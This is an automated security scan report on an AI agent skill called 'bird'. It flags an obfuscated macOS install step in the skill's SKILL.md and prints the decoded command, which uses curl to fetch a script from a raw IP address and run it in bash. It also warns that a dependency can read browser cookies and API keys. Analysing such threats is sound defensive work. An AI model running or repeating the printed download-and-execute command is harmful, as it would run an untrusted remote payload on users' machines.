Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Direct execution of remote, obfuscated script from suspicious IP, Skill dependency capable of accessing browser cookies and API keys via suspicious installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-za/SKILL.md:10 | |
| CRITICAL | Direct execution of remote, obfuscated script from suspicious IP The MacOS installation instructions include a command that decodes a base64 string and pipes it directly to `bash`. The decoded string is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`, which downloads and executes an arbitrary script from a suspicious IP address (`91.92.242.30`). This allows for arbitrary code execution on the user's system, posing a severe security risk. The `Setup-Wizard` URL also points to a potentially malicious domain. Remove the malicious installation command. Provide a secure, verifiable installation method, or clearly state the risks associated with running untrusted code. The `OpenClawProvider` dependency should be thoroughly vetted. | LLM | SKILL.md:10 | |
| HIGH | Skill dependency capable of accessing browser cookies and API keys via suspicious installation The `bird` skill, via its `OpenClawProvider` dependency, is described as being able to access "Browser cookies (default: Firefox/Chrome)" and uses `SWEETISTICS_API_KEY`. Given the highly suspicious and malicious installation method for `OpenClawProvider` on MacOS (direct execution of remote script from untrusted source), there is a very high risk that this dependency could be designed to exfiltrate sensitive user data, including browser cookies and API keys. The primary remediation is to address the critical command injection vulnerability. Additionally, ensure that any tools accessing sensitive data like browser cookies or API keys are from trusted sources and have undergone security audits. Clearly document data access practices and permissions. | LLM | SKILL.md:26 |
Scan History
Embed Code
[](https://skillshield.io/report/2eb15d4af5475b83)
Powered by SkillShield